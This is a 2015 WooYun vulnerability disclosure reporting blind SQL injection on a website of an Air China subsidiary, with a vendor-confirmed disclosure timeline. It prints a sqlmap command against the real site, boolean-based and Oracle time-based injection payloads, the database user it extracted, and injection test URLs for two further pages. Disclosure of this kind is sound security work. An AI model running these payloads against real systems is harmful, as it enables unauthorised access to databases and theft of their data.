当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101256

漏洞标题:中国国际航空股份有限公司旗下某站SQL注入

相关厂商:中国国际航空股份有限公司

漏洞作者: 路人甲

提交时间:2015-03-14 11:35

修复时间:2015-04-28 11:36

公开时间:2015-04-28 11:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-14: 细节已通知厂商并且等待厂商处理中
2015-03-16: 厂商已经确认,细节仅向厂商公开
2015-03-26: 细节向核心白帽子及相关领域专家公开
2015-04-05: 细节向普通白帽子公开
2015-04-15: 细节向实习白帽子公开
2015-04-28: 细节向公众公开

简要描述:

几个盲注

详细说明:

#1

python sqlmap.py -u http://www.cae.com.cn/webfunction/webpage.aspx?nid=b12e467fdc9449fe820572fb895a94e2 --current-user -v 0
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=b12e467fdc9449fe820572fb895a94e2' AND 9490=9490 AND 'dpEz'='dpE
z
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: nid=b12e467fdc9449fe820572fb895a94e2' AND 8658=(SELECT COUNT(*) FRO
M ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'LctK'='
LctK
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
sqlmap got a 302 redirect to 'http://www.cae.com.cn:80/Error.aspx'. Do you want
to follow? [Y/n] n
current user: 'WEBCAE'


以及底下这两个 sqlmap没跑出数据库名 T T 不过是可以注入的
http://www.cae.com.cn/jsdir/adimage.aspx?advertisingId=Ad0002%27%20and%20%271%27=%271 正常
http://www.cae.com.cn/jsdir/adimage.aspx?advertisingId=Ad0002%27%20and%20%271%27=%272 错误
http://www.cae.com.cn/jsdir/wqimage.aspx?networkId=1fe387043cc446a68121b54825d95019%27%20and%20%271%27=%271 正常
http://www.cae.com.cn/jsdir/wqimage.aspx?networkId=1fe387043cc446a68121b54825d95019%27%20and%20%271%27=%272 错误

漏洞证明:

比如

搜狗截图15年03月13日2350_1.jpg

搜狗截图15年03月13日2352_3.jpg

修复方案:

目测注入还有,最好全部排查一下

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-03-16 13:40

厂商回复:

感谢对民航快递的帮助!

最新状态:

暂无


漏洞评价:

评论